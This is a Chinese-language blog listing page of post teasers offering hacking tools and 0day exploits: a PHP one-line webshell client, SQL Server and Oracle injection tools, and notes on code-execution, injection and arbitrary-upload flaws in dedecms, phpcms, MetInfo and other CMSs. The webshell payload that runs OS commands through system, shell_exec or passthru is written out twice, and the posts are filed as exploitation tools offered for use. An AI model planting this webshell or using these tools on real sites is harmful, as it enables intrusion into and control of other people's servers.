预览模式: 普通 | 列表

黑客狙击者v1.0



1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在,自行创建)

2. 切换到软件目录,然后执行:sniper_svc.exe /install 即可

查看更多...

Tags: websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1763


20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 64 | 引用: 0 | 查看次数: 11713


dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 86 | 引用: 0 | 查看次数: 14121


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1669

WebSmart Web应用漏洞扫描器v1.4


   网站应用安全评估系统即是一款用于Web应用远程安全检测的软件产品。
可下载安装,支持Windows操作系统,
用于对自己的网站进行日常的安全检查。
适用对象:网站规模和数量较小的企业、学校、事业单位等。
价格: 6,000元/年 ,3,000元/月,试用30次无限制。

查看更多...

Tags: 扫描器

分类:WebSmart | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 4796

【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru
版本2功能:软件是一个php脚本木马,将<?php $page = $_REQUEST['page'];

查看更多...

Tags: php

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2715

河马SQLServer注入工具v1.2



如果存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,
或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,这个工具有一个亮
点是支持cookie
和身份验证。

查看更多...

Tags: sql

分类:SQL注入工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3347

会员上传文件漏洞,可以上传任意后缀

user/swfupload.asp文件漏洞

If UpFileObj.Form("NoReName")="1" Then '不更名

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3108

漏洞文件: img.php
<?php

# MetInfo Enterprise Content Management System

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 10 | 引用: 0 | 查看次数: 3298


歪酷cms2.0版本Search.html存在远程代码执行漏洞,成功利用该漏洞
的攻击者,
能以php进程用户权限执行任意代码。
下载只允许会员下载 该文件只允许会员下载! 登录 | 注册

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2515

dedeCms 5.7recommend.php 注入漏洞利用工具


漏洞文件: uploadsafe.inc.php

首先对比下补丁,发现修改了几个文件,其中的\include\uploadsafe.inc.php修改了代码

补丁前代码为:

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3472

漏洞分析

在中 v9\phpcms\modules\member\index.php381行处

public function account_manage_avatar() {

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2555

【河马】Oracle注入工具v1.1


Support oracle db Union
Support oracle db Http Reverse
Support oracle db Error Mode 1(utl_inaddr)
Support oracle db Error Mode 2
Support oracle db Error Mode 3

查看更多...

Tags: sql

分类:SQL注入工具 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 3354
无标题文档